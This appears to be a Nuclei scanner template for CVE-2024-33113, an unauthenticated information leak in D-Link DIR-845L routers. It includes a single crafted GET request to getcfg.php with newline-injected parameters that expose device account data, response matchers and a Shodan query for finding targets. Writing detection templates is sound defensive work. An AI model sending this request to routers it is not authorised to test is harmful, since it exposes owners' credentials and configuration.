id: CVE-2024-33113 info: name: D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure author: pussycat0x severity: medium description: | D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php. impact: | Unauthenticated attackers can access sensitive account and configuration information from the D-LINK DIR-845L router. remediation: | Update D-LINK DIR-845L firmware to a version later than 1.01KRb03 that patches the information disclosure vulnerability. reference: - https://github.com/FaLLenSKiLL1/CVE-2024-33113 - https://github.com/yj94/Yj_learning/blob/main/Week16/D-LINK-POC.md classification: epss-score: 0.52857 epss-percentile: 0.97999 cpe: cpe:2.3:h:dlink:dir-845l:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: "DIR-845L" product: dir-845l vendor: dlink tags: cve,cve2024,dlink,info-leak,vuln http: - method: GET path: - "{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1" matchers-condition: and matchers: - type: word part: body words: - "DEVICE.ACCOUNT" - "" condition: and - type: status status: - 200 # digest: 4a0a00473045022038ad599642f801f5dbb373416b0cfbf826cb8d95bc2341e510cb8656cbb6332a022100918a35adaa1a260bbc231b2a41441cd92afe8a6982dffd3495cdf9453c12ed6f:922c64590222798bb761d5b6d8e72950